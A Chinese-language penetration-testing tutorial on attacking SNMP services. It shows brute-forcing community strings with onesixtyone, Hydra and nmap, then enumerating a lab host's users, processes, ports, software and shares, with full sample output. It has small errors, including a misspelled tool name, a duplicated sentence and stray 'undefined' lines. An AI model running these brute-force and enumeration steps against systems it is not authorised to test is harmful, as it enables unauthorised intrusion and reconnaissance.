网络扫描:利用SNMP服务
SNMP(Simple Network Management Protocol,简单网络管理协议)是由一组网络管理的标准组成,包含一个应用层协议和一组资源对象。该协议能够支持网络管理系统,用以监测连接到网络上的设备是否有任何引起管理上关注的情况。本文介绍利用SNMP服务获取主机信息的方法。
1. SNMP服务概述
SNMP是一种简单的网络管理协议,它使用UDP协议通过以太网来执行网络管理。下面介绍SNMP服务的一些基础知识。
(1)SNMP服务的构成
SNMP协议主要由两大部分构成,分别是SNMP管理站和SNMP代理。其中,SNMP管理站是一个中心节点,负责收集维护各个SNMP元素的信息,并对这些信息进行处理,最后反馈给网络管理员;而SNMP代理是运行在各个被管理的网络节点之上,负责统计该节点的各项信息,并且负责与SNMP管理站交互,接收并执行管理站的命令,上传各种本地的网络信息。
SNMP管理站和SNMP代理之间是松散耦合的关系。它们之间的通信是通过UDP协议完成的。一般情况下,SNMP管理站通过UDP协议向SNMP代理发送各种命令。当SNMP代理收到命令后,返回SNMP管理站需要的参数。当SNMP代理检测到网络元素异常的时候,也可以主动向SNMP管理站发送消息,通知当前异常状况。
(2)SNMP工作方式
SNMP服务采用UDP协议在管理端和代理端之间传输信息。SNMP采用UDP端口161接收和发送请求,162端口接收Trap信息,执行SNMP的设备默认都必须使用这些端口。
(3)SNMP版本
SNMP目前共有v1、v2和v3 3个版本,这3个版本的区别如下。
SNMP v1:是SNMP协议的最初版本,不过依然是众多厂家实现SNMP的基本方式。
SNMP v2:通常指基于Community的SNMP V2,Community实质上就是密码。
SNMP v3:是最新版本的SNMP。其最大改进在于安全性,增加了对认证和密文传输的支持。
2. 暴力破解SNMP服务
如果要访问SNMP服务,则需要知道其密码。所以,如果要利用SNMP服务来获取主机信息的话,则需要先知道其加密的密码串。下面介绍暴力破解SNMP服务的方法。
(1)使用Onesixtyoue工具
Onesixtyoue是一个专门针对于SNMP协议的扫描器。如果指定其密码,即可获取到目标主机的相关信息;如果不知道密码,也可以用来实施密码破解。使用Onesixtyoue工具破解SNMP服务密码的语法格式如下:
onesixtyoue [host] -c [communityfile]
其中,-c[communityfile]选项用于指定尝试的密码文件。
使用Onesixtyoue工具破解SNMP服务密码。执行命令如下:
root@daxueba:~# onesixtyone 192.168.1.5 -c /root/password.lst
Scanning 1 hosts, 15 communities
192.168.1.5 [public] Hardware: Intel64 Family 6 Model 42 Stepping 7 AT/AT
COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free)
从输出的信息可以看到,使用Onesixtyoue工具成功破解出了SNMP服务的密码,并且获取到了目标主机信息。其中,破解出的密码为public;目标主机的硬件为Intel64、操作系统为Windows Version 6.1。
(2)使用Hydra工具
Hydra是著名的黑客组织THC的一款开源暴力破解工具。目前,该工具支持破解的服务有FTP、MySQL、SNMP、SSH等。用于暴力破解SNMP服务的语法格式如下:
hydra -P [passwordfile] [host] snmp
其中,-P选项指定用于破解的密码文件。
使用Hydra工具实施SNMP服务暴力破解。执行命令如下:
root@daxueba:~# hydra -P /root/password.lst 192.168.1.5 snmp
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-08-04 14:33:50
[DATA] max 15 tasks per 1 server, overall 15 tasks, 15 login tries (l:1/p:15),~1 try per task
[DATA] attacking snmp://192.168.1.5:161/
[161][snmp] host: 192.168.1.5 password: public
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-08-04 14:33:58
从以上输出的信息可以看到,使用Hydra工具成功破解出了目标主机上SNMP服务的密码,该密码为public。
(3)使用Nmap工具
在Nmap工具中提供了一个脚本snmp-brute,可以用来实施SNMP服务暴力破解。其中,使用该脚本实施暴力破解的语法格式如下:
nmap -sU -p [port] --script=snmp-brute [host] --script-args=snmp-brute.
communitiesdb=[password]
以上语法中的选项及含义如下:
-sU:实施UDP扫描。
-p[port]:指定目标服务的端口。
--script:实施SNMP服务暴力破解脚本。
--script-args:指定实施暴力破解的参数。
对目标SNMP服务实施暴力破解。执行命令如下:
root@daxueba:~# nmap -sU -p 161 --script=snmp-brute 192.168.1.5 --script-
args=snmp-brute.communitiesdb=/root/password.lst
Starting Nmap 7.70 ( https://nmap.org ) at 2021-08-04 14:35 CST
Nmap scan report for test-pc (192.168.1.5)
Host is up (0.00025s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials #有效认证
MAC Address: 00:0C:29:21:8C:96 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.11 seconds
从输出的信息可以看到,使用Nmap工具成功破解出了目标服务的密码,该密码为public。
undefined
3. 获取主机信息
当确定目标主机上开启了SNMP服务时,可以利用SNMP服务来获取主机信息。下面介绍获取主机信息的方法。
(1)使用Onesixtyoue工具
Onesixtyoue是一个简单的SNMP分析工具,使用该工具,仅请求指定地址的系统描述值。在使用Onesixtyoue工具分析SNMP时,需要指定目标IP地址和社区字符串。该工具默认的社区字符串是public。使用Onesixtyoue工具获取主机信息的语法格式如下:
onesixtyone [host] [community]
例如,使用Onesixtyoue工具,获取主机信息。执行命令如下:
root@daxueba:~# onesixtyone 192.168.6.109 public
Scanning 1 hosts, 1 communities
192.168.6.109 [public] Hardware: Intel64 Family 6 Model 42 Stepping 7 AT/AT
COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free)
从以上输出信息中,可以看到显示出了主机192.168.6.109的操作系统类型、版本和系统硬件等信息。
(2)使用SNMPwalk工具
SNMPwalk是一个比较复杂的SNMP扫描工具,它可以收集使用SNMP社区字符串设备的大量信息。使用SNMPwalk工具获取主机信息的语法格式如下:
snmpwalk [host] -c [community] -v [version]
以上语法中的选项及含义如下。
-c:指定SNMP服务的密码串。
-v:指定使用的SNMPwalk版本。目前有1c、2c和3c这3个版本。
使用SNMPwalk工具利用主机192.168.1.5上的SNMP服务来获取主机信息。在该主机中SNMP服务默认的社区字符串为public,版本为2c。执行命令如下:
root@daxueba:~# snmpwalk 192.168.1.5 -c public -v 2c
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: Intel64 Family 6 Model 42 Stepping 7 AT/AT COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (649146) 1:48:11.46
iso.3.6.1.2.1.1.4.0 = ""
iso.3.6.1.2.1.1.5.0 = STRING: "Test-PC"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
iso.3.6.1.2.1.2.1.0 = INTEGER: 24
iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1
iso.3.6.1.2.1.2.2.1.1.2 = INTEGER: 2
iso.3.6.1.2.1.2.2.1.1.3 = INTEGER: 3
iso.3.6.1.2.1.2.2.1.1.4 = INTEGER: 4
iso.3.6.1.2.1.2.2.1.1.5 = INTEGER: 5
iso.3.6.1.2.1.2.2.1.1.6 = INTEGER: 6
iso.3.6.1.2.1.2.2.1.1.7 = INTEGER: 7
iso.3.6.1.2.1.2.2.1.1.8 = INTEGER: 8
iso.3.6.1.2.1.2.2.1.1.9 = INTEGER: 9
iso.3.6.1.2.1.2.2.1.1.10 = INTEGER: 10
iso.3.6.1.2.1.2.2.1.1.11 = INTEGER: 11
iso.3.6.1.2.1.2.2.1.1.12 = INTEGER: 12
iso.3.6.1.2.1.2.2.1.1.13 = INTEGER: 13
iso.3.6.1.2.1.2.2.1.1.14 = INTEGER: 14
iso.3.6.1.2.1.2.2.1.1.15 = INTEGER: 15
iso.3.6.1.2.1.2.2.1.1.16 = INTEGER: 16
iso.3.6.1.2.1.2.2.1.1.17 = INTEGER: 17
iso.3.6.1.2.1.2.2.1.1.18 = INTEGER: 18
iso.3.6.1.2.1.2.2.1.1.19 = INTEGER: 19
iso.3.6.1.2.1.2.2.1.1.20 = INTEGER: 20
iso.3.6.1.2.1.2.2.1.1.21 = INTEGER: 21
iso.3.6.1.2.1.2.2.1.1.22 = INTEGER: 22
iso.3.6.1.2.1.2.2.1.1.23 = INTEGER: 23
iso.3.6.1.2.1.2.2.1.1.24 = INTEGER: 24
iso.3.6.1.2.1.2.2.1.2.1 = Hex-STRING: 53 6F 66 74 77 61 72 65 20 4C 6F 6F 70 62 61 63 6B 20 49 6E 74 65 72 66 61 63 65 20 31 00
iso.3.6.1.2.1.2.2.1.2.2 = Hex-STRING: 57 41 4E 20 4D 69 6E 69 70 6F 72 74 20 28 53 53 54 50 29 00
iso.3.6.1.2.1.2.2.1.2.3 = Hex-STRING: 57 41 4E 20 4D 69 6E 69 70 6F 72 74 20 28 4C 32 54 50 29 00
从以上输出信息中可以看到显示出了主机192.168.1.5上大量设备的唯一标识符(OID)信息。
(3)使用snmp-check工具
snmp-check是一款枚举SNMP信息工具,该工具会显示具体信息名称,而不像SNMPwalk工具一样只显示iso序列号。snmp-check工具支持的枚举包括设备、域、硬件,以及存储信息、主机名和监听端口等。使用snmp-check工具枚举SNMP信息的语法格式如下:
snmp-check [option] [target IP address]
这里常用的选项option及含义如下。
-p:指定SNMP服务的端口,默认是161。
-c:指定SNMP服务的密码串,默认是public。
-v:指定SNMP版本,可指定的版本有1和2c,其中,默认版本是1。
-t:指定超时值,默认是5秒。
使用snmp-check工具获取目标主机信息,执行命令如下:
root@daxueba:~# snmp-check 192.168.1.5
执行以上命令后,将会输出大量与主机相关的信息。下面依次介绍每个部分,并对其输出结果进行描述。
1)获取到的系统信息,如主机名、IP地址、操作系统类型及架构等。具体如下:
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.1.5:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 192.168.1.5 #目标主机IP地址
Hostname : Test-PC #主机名
Description : Hardware: Intel64 Family 6 Model 42 Stepping 7 AT/AT COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free) #描述信息
Contact #联系人
Location #描述
Uptime snmp : 04:59:17.32 #SNMP服务运行的时间
Uptime system : 02:03:16.26 #目标系统运行的时间
System date : 2021-08-04 16:15:50.0 #当前目标系统的时间
Domain : WORKGROUP
输出的信息显示了该系统中的所有用户。其中,目标主机中的用户有bob、ftp、Test等。
2)获取用户账号信息:
[*] User accounts:
bob
ftp
Test
Guest
Administrator
HomeGroupUser$
输出的信息显示了该系统中的所有用户。其中,目标主机中的用户有bob、ftp、Test等。
3)获取网络信息:
[*] Network information:
IP forwarding enabled : no #是否启用IP转发
Default TTL : 128 #默认TTL值
TCP segments received : 19004 #收到TCP段
TCP segments sent : 16820 #发送TCP段
TCP segments retrans : 179 #重发TCP端
Input datagrams : 28944 #输入数据报
Delivered datagrams : 35035 #传输的数据报
Output datagrams : 43038 #输出数据报
以上信息显示了该目标系统中网络的相关信息,如默认TTL值、收到TCP段、发送TCP段、重发TCP段等。
4)获取网络接口信息:
[*] Network interfaces:
Interface : [ up ] Software Loopback Interface 1 #接口描述信息
Id : 1 #接口ID
Mac Address : ::::: #MAC地址
Type : softwareLoopback #接口类型
Speed : 1073 Mbps #接口速度
MTU : 1500 #最大传输单元
In octets : 0 #八位字节输入
Out octets : 0 #八位字节输出
Interface : [ up ] WAN Miniport (SSTP)
Id : 2
Mac Address : :::::
Type : unknown
Speed : 1073 Mbps
MTU : 4091
In octets : 0
Out octets : 0
……省略部分内容
Interface : [ up ] WAN Miniport (Network Monitor)-QoS Packet Scheduler-0000
Id : 24
Mac Address : a8:ac:20:52:41:53
Type : ethernet-csmacd
Speed : 1073 Mbps
MTU : 1500
In octets : 0
Out octets : 0
以上输出信息显示了当前系统中的所有接口信息。其中,分别显示了每个接口的ID、MAC地址、类型、速度和最大传输单元等。
5)获取网络IP信息:
[*] Network IP:
Id IP Address Netmask Broadcast
1 127.0.0.1 255.0.0.0 1
11 192.168.1.5 255.255.255.0 1
18 192.168.67.1 255.255.255.0 1
17 192.168.254.1 255.255.255.0 1
以上显示的信息,表示当前目标主机中所有的网络接口地址信息。从以上输出信息中可以看到共有4个接口。其中,IP地址分别是127.0.0.1、192.168.1.5、192.168.67.1和192.168.254.1。
6)获取路由信息:
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 192.168.1.1 0.0.0.0 10
127.0.0.0 127.0.0.1 255.0.0.0 306
127.0.0.1 127.0.0.1 255.255.255.255 306
127.255.255.255 127.0.0.1 255.255.255.255 306
192.168.1.0 192.168.1.5 255.255.255.0 266
192.168.1.5 192.168.1.5 255.255.255.255 266
192.168.1.255 192.168.1.5 255.255.255.255 266
192.168.67.0 192.168.67.1 255.255.255.0 276
192.168.67.1 192.168.67.1 255.255.255.255 276
192.168.67.255 192.168.67.1 255.255.255.255 276
192.168.254.0 192.168.254.1 255.255.255.0 276
192.168.254.1 192.168.254.1 255.255.255.255 276
192.168.254.255 192.168.254.1 255.255.255.255 276
224.0.0.0 127.0.0.1 240.0.0.0 306
255.255.255.255 127.0.0.1 255.255.255.255 306
以上信息表示目标系统的一个路由表信息,该路由表包括目的地址、下一跳地址、子网掩码及距离。
7)获取监听的TCP端口:
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 21 0.0.0.0 0 listen
0.0.0.0 22 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 443 0.0.0.0 0 listen
0.0.0.0 902 0.0.0.0 0 listen
0.0.0.0 912 0.0.0.0 0 listen
127.0.0.1 1434 0.0.0.0 0 listen
127.0.0.1 5357 127.0.0.1 49733 timeWait
127.0.0.1 8307 0.0.0.0 0 listen
127.0.0.1 14147 0.0.0.0 0 listen
192.168.1.5 139 0.0.0.0 0 listen
192.168.1.5 49161 42.236.37.114 80 established
192.168.1.5 49730 223.167.166.52 80 established
192.168.67.1 139 0.0.0.0 0 listen
192.168.254.1 139 0.0.0.0 0 listen
以上信息表示两台主机建立TCP连接后的信息,包括本地地址(Local address)、本地端口(Local port)、远端主机地址(Remote address)、远端主机端口(Remote port)和状态(State)。
undefined
8)获取监听的UDP端口信息:
[*] Listening UDP ports:
Local address Local port
0.0.0.0 161
0.0.0.0 500
0.0.0.0 3544
0.0.0.0 3600
0.0.0.0 3702
0.0.0.0 4500
0.0.0.0 5355
0.0.0.0 45769
0.0.0.0 50529
0.0.0.0 60289
0.0.0.0 60399
0.0.0.0 62219
127.0.0.1 1900
127.0.0.1 56372
192.168.1.5 137
192.168.1.5 138
192.168.1.5 1900
192.168.1.5 56371
192.168.1.5 65005
192.168.67.1 137
192.168.67.1 138
192.168.67.1 1900
192.168.254.1 137
192.168.254.1 138
192.168.254.1 1900
以上信息表示目标主机中已开启的UDP端口号。其中,开放的端口有137、138和1900等。
9)获取网络服务信息:
[*] Network services:
Index Name
0 Power
1 Server
2 Themes
3 IP Helper
4 DNS Client
5 Superfetch
6 DHCP Client
7 Workstation
8 SNMP Service
9 VMware Tools
10 主动防御
11 Offline Files
…省略部分内容
61 SQL Server Integration Services
62 VMware 物理磁盘助手服务
63 Function Discovery Provider Host
64 Peer Networking Identity Manager
65 System Event Notification Service
66 World Wide Web Publishing Service
67 Extensible Authentication Protocol
68 Windows Management Instrumentation
69 Windows Process Activation Service
70 Distributed Transaction Coordinator
71 IKE and AuthIP IPsec Keying Modules
72 Desktop Window Manager Session Manager
73 Background Intelligent Transfer Service
74 Function Discovery Resource Publication
75 VMware Alias Manager and Ticket Service
76 WinHTTP Web Proxy Auto-Discovery Service
77 SQL Server Analysis Services (MSSQLSERVER)
以上信息显示了目标主机中安装的所有服务。在以上信息中,第1列表示服务索引,第2列表示服务名称。由于篇幅所限,这里只列出了一少部分服务。
10)获取进程信息:
[*] Processes:
Id Status Name Path Parameters
1 running System Idle Process
4 running System
300 running smss.exe \SystemRoot\System32\
396 running csrss.exe %SystemRoot%\system32\ Object
Directory=\Windows SharedSection=1024,20480,768 Windows=On SubSystem Type=Windows ServerDll=basesrv,1 ServerDll=winsrv:User
436 running wininit.exe
448 running csrss.exe %SystemRoot%\system32\ Object
Directory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:User
484 running winlogon.exe
540 running services.exe C:\Windows\system32\
556 running lsass.exe C:\Windows\system32\
564 running lsm.exe C:\Windows\system32\
652 running svchost.exe
696 running vmtoolsd.exe C:\Program Files\VMware\VMware Tools\ -n vmusr
从以上显示的信息中可以看到共有5列,分别是ID号(Id)、状态(Status)、进程名(Name)、路径(Path)和参数(Parameters)。限于篇幅,这里仅简单列举了几个进程的相关信息。
11)获取存储信息:
[*] Storage information:
Description : ["C:\\ Label: Serial Number d0ce180b"] #描述信息
Device id : [#] #设备ID
Filesystem type : ["unknown"] #文件系统类型
Device unit : [#] #设备单元
Memory size : 299.90 GB #内存总大小
Memory used : 49.66 GB #已用内存大小
Description : ["D:\\"]
Device id : [#]
Filesystem type : ["unknown"]
Device unit : [#]
Memory size : 0 bytes
Memory used : 0 bytes
Description : ["E:\\ Label:\xD0\xC2\xBC\xD3\xBE\xED
Serial Number c6d01134"]
Device id : [#]
Filesystem type : ["unknown"]
Device unit : [#]
Memory size : 300.00 GB
Memory used : 24.54 GB
Description : ["Virtual Memory"]
Device id : [#]
Filesystem type : ["unknown"]
Device unit : [#]
Memory size : 4.00 GB
Memory used : 1.66 GB
Description : ["Physical Memory"]
Device id : [#]
Filesystem type : ["unknown"]
Device unit : [#]
Memory size : 2.00 GB
Memory used : 1.05 GB
该部分显示了系统中的所有磁盘信息,包括盘符名、设备ID、文件系统类型、总空间大小及已用空间大小。
12)获取文件系统信息:
[*] File system information:
Index : 1 #索引
Mount point : #挂载点
Remote mount point : - #远程挂载点
Access : 1 #是否允许访问
Bootable : 0 #是否可以引导
以上显示了当前目标主机的文件系统信息。从以上信息中可以看到文件系统的索引、挂载点及访问权限等信息。
13)获取设备信息:
[*] Device information:
Id Type Status Descr
1 unknown running Snagit 11 Printer
2 unknown running Microsoft XPS Document Writer
3 unknown running Microsoft Shared Fax Driver
4 unknown running Unknown Processor Type
5 unknown unknown Software Loopback Interface 1
6 unknown unknown WAN Miniport (SSTP)
7 unknown unknown WAN Miniport (L2TP)
8 unknown unknown WAN Miniport (PPTP)
9 unknown unknown WAN Miniport (PPPOE)
……省略部分内容
29 unknown unknown D:\
30 unknown running Fixed Disk
31 unknown running Fixed Disk
32 unknown running IBM enhanced (101- or 102-key) keyboard,
Subtype=(0)
33 unknown unknown COM1:
以上信息显示了该系统中所有设备的相关信息,如打印设备、网络设备和处理器等。
14)获取软件组件信息:
[*] Software components:
Index Name
1 DAEMON Tools Lite
2 Microsoft SQL Server 2005 (64 λ)
3 USBPcap 1.2.0.4
4 WinRAR 5.50 (64-λ)
5 Microsoft .NET Framework 4.7.2
6 Microsoft SQL Server ?????????????(???)
7 Microsoft Visual C++ 2017 x64 Additional Runtime –14.12.25810
8 Microsoft .NET Framework 4.7.2 (CHS)
9 VMware Tools
10 Microsoft SQL Server 2005 ??????
11 Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
12 Microsoft SQL Server 2005 Analysis Services (64 λ)
13 Microsoft Visual C++ 2013 x64 Additional Runtime –12.0.21005
14 Microsoft .NET Framework 4.7.2
15 Microsoft .NET Framework 4.7.2 (????????)
16 Microsoft SQL Server 2005 Integration Services (64 λ)
17 SQLXML4
18 VMware Workstation
19 Microsoft Visual C++ 2013 x64 Minimum Runtime –12.0.21005
20 Microsoft SQL Server VSS ??д??
21 Microsoft Visual C++ 2017 x64 Minimum Runtime –14.12.25810
22 Microsoft SQL Server Native Client
23 Microsoft SQL Server 2005 Notification Services (64 λ)
24 Microsoft SQL Server 2005 Tools (64 λ)
25 Microsoft SQL Server 2005 (64 λ)
以上信息显示了目标主机中安装的所有软件组件。例如,安装的软件组件有DAEMON Tools Lite、Microsoft SQL Server 2005(64λ)、USBPcap 1.2.0.4和WinRAR 5.50(64-λ)等。
15)IIS服务信息:
[*] IIS server information:
TotalBytesSentLowWord : 0 #发送的最低总字节数
TotalBytesReceivedLowWord : 0 #接收的最低总字节数
TotalFilesSent : 0 #总共发送的文件
CurrentAnonymousUsers : 0 #当前匿名用户
CurrentNonAnonymousUsers : 0 #当前非匿名用户
TotalAnonymousUsers : 0 #匿名用户总数
TotalNonAnonymousUsers : 0 #非匿名用户总数
MaxAnonymousUsers : 0 #最大匿名用户总数
MaxNonAnonymousUsers : 0 #最大非匿名用户总数
CurrentConnections : 0 #当前连接数
MaxConnections : 0 #最大连接数
ConnectionAttempts : 0 #尝试连接数
LogonAttempts : 0 #尝试登录数
Gets : 0 #Get请求数
Posts : 0 #Post请求数
Heads : 0 #Head请求数
Others : 0 #其他请求数
CGIRequests : 0 #CGI请求数
BGIRequests : 0 #BGI请求数
NotFoundErrors : 0 #没有找到的错误数
以上输出信息显示了目标主机中IIS服务的相关信息,包括服务器允许发送/接收的字节数、匿名用户和最大连接数等信息。
16)共享信息:
[*] Share:
Name : Users
Path : C:\Users
Comment :
Name : share
Path : E:\share
Comment :
在以上信息中显示了目标主机中的共享用户和文件名。从显示的结果可以看到,共享的用户为Users、共享的文件夹为E:\share。
